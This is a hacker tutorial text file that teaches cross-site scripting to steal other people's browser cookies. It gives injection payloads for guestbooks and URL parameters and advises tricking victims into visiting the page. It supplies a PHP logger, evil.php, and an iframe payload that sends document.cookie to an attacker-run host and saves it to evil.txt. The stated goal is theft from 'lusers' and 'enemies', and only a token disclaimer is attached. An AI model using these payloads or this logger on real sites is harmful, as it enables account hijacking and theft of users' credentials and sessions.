Cookie Stealing for phun and profit
[root@Athleone] ~
$ cat cookiestealing.txt
Cookie Stealing
Written by Athleone(or D4T4_L33CH)
===============================================
######################################################
0x10 Introduction
XSS
(cross site scripting) is usually criticized. It is said that XSS can
do nothing, actually. All it can do is make a nice little alert box on
your screen, telling you your cookies. That is a wrong assumption.
Although it may be slightly difficult, you can use XSS to steal a
user's cookies. Cookies are used to store valuable information such as
Username, Password, IP address and much more. This tutorial aims at
teaching you Cookie Stealing, and by the end of this text file, you
should be able to independently steal other people's cookies.
DISCLAIMER:
This
text is for educational purposes only. The author will not be held
liable for any damages that occur from a reader for following this text
or even learning from it.
######################################################
0x20 Finding the vulnerability
First,
you have to find the XSS vulnerability. This may prove to be a bit of a
challenge, but for sites with lower security, this is actually quite
easy. For example, have you ever seen one of those guestbooks? Some of
them are not properly configured to filter the text you type in. What
does this mean? It means that you can manipulate the HTML of the page,
and inject javascript code! Alright, let's start off with something
simple. Type this into the guestbook:
<script type="text/javascript">
alert(document.cookie)
</script>
Okay,
now that's done, click enter. If the guestbook does not properly check
its input, then you should be able to see your cookie pop up! Of
course, if you type that in and it doesn't work, its probably gonna be
a bit embarrassing, especially when the site admin taunts you. Anyway,
to test whether a guestbook properly filters its input, type something
like "You guys <b>suck</b>." and see if the "suck" comes up
in bold text.
If it does, the guestbook is probably not configured
to filter input. However, XSS is not limited to guest books. Places in
which you can change the HTML such as a page that uses a URL parameter
to display an image or text, can be injected with a healthy dose
of XSS. For example, the URL is this:
site/bla.php?whatever=lol.gif
Now, imagine what the HTML for the image would be like...
<img src="lol.gif">
so they add a "> at the back, which means we can do this:
(start URL here)
site/bla.php?whatever=lol.gif"><script type="text/javascript">
alert(document.cookie)</script><a href="test
(End url here)
and you're done!
######################################################
0x30 Opening the gate
(This chapter is only for those who chose the URL as the XSS injection point, by the way)
Alright, all this is nice and pretty, but as I have said at the top, people criticize XSS as it can only work in your browser.
This
means that to get an enemy's password, you have to get him to sit down,
login, and go to the injection page, then show you the alert box.
Forgive my language, but like HELL that's going to work. You have to be
smart. You have to TRICK them into going into the page, and then use a
technique I will explain in a later section to get their cookies.
This tricking technique is something known as social engineering. Don't worry; it's not
complicated
at all. All you have to do is fool your friend. For example, if the
page you are fooling him into going into is the guestbook, then you can
say something like "Look at this cool guestbook! (insert URL here)" Be
Creative. Don't do it yet though, we still have the last piece of
preparation to go...
######################################################
0x40 The Stealing
But
once the luser goes to the site, what do you do then? "Hey, tell me all
that info in that suspicious looking text box please?" Yeah right.
This
is where the PHP code comes in. Get a free web host that supports PHP
(preferably something like www.t35.com, although you will be breaking
the rules in their TOS...) and make a new file. In the new file, type
in this:
Code :-
<html>
<body>
$stuff=$_GET['stuff'] . "\n";
$fh=fopen('evil.txt','ab');
fwrite($fh,$stuff);
fclose($fh);
?>
</body>
</html>
Wheee
that was fun. Alright, save it as evil.php. Now make an empty text file
named evil.txt, and type some stuff into it such as "Cookie Stealer
Phile (Newline here)". Alright, now you have to change the script that
you put into the vulnerable site. Change it to
<IFRAME
SRC="javascript:window.location=%22(site)/evil.php?stuff=%22+document.cookie"
height="1" width="1" frameborder="0"></IFRAME>
Of
course, change (site) into your site, and you are ready to go! Whenever
a new luser gets lured into the trap, his cookies will be added to
evil.txt!
######################################################